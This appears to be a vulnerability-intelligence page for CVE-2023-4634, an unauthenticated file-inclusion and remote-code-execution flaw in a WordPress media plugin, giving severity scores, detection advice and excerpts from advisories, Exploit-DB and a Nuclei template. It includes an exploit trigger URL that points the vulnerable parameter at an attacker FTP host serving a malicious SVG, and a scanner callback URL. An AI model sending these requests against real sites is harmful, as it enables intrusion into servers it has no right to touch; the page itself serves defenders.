CVE-2023-4634
published 2023-09-06CVE-2023-4634: The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This…
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
82.58%
99.6th percentile
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| davidlingren | media_library_assistant | < 3.10 | 3.10 |
| dglingren | media_library_assistant | <= 3.09 | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg↗
- →Monitor GET requests to mla-stream-image.php containing an `mla_stream_file` parameter with an FTP scheme (ftp://) — this is the primary exploitation vector for CVE-2023-4634. ↗
- →Use Shodan/FOFA/PublicWWW queries to identify exposed WordPress instances running the vulnerable plugin before active exploitation. ↗
- →Detect DNS/FTP callback interactions triggered by the mla_stream_file parameter pointing to an external host — indicative of SSRF/LFI probing. ↗
- →Flag presence of `mla_debug=log` and `mla_stream_frame=1` query parameters alongside `mla_stream_file` as indicators of active exploitation attempts. ↗
- ·Exploitation success is dependent on the Imagick policy.xml configuration on the target server. Default WordPress/Imagick installations are most at risk. ↗
- ·The vulnerability is unauthenticated and exploitable via attacker-controlled FTP-hosted SVG files processed by Imagick; no WordPress credentials are required. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8mv6-q53q-hqj8: The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3
ghsa_unreviewed·2023-09-06
CVE-2023-4634 [CRITICAL] CWE-73 GHSA-8mv6-q53q-hqj8: The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
VulnCheck
Media Library Assistant plugin for WordPress Local File Inclusion and Remote Code Execution
vulncheck·2023·CVSS 9.8
CVE-2023-4634 [CRITICAL] Media Library Assistant plugin for WordPress Local File Inclusion and Remote Code Execution
Media Library Assistant plugin for WordPress Local File Inclusion and Remote Code Execution
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
Affected: davidlingren media_library_assistant
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unava
No detection rules found.
Exploit-DB
Media Library Assistant Wordpress Plugin - RCE and LFI
exploitdb·2023-10-09·CVSS 9.8
CVE-2023-4634 [CRITICAL] Media Library Assistant Wordpress Plugin - RCE and LFI
Media Library Assistant Wordpress Plugin - RCE and LFI
---
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version:
xmlns="http://www.w3.org/2000/svg">
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Dir
Nuclei
Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
nuclei·CVSS 9.8
CVE-2023-4634 [CRITICAL] Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
Template:
id: CVE-2023-4634
info:
name: Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
author: Pepitoh,ritikchaddha
severity: critical
description: |
A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to local files.
remediation: Fixed in ve
No writeups or analysis indexed.
https://github.com/Patrowl/CVE-2023-4634/https://packetstormsecurity.com/files/174508/wpmla309-lfiexec.tgzhttps://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4https://www.wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cvehttps://github.com/Patrowl/CVE-2023-4634/https://packetstormsecurity.com/files/174508/wpmla309-lfiexec.tgzhttps://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4https://www.wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve
2023-09-06
Published
Exploited in the wild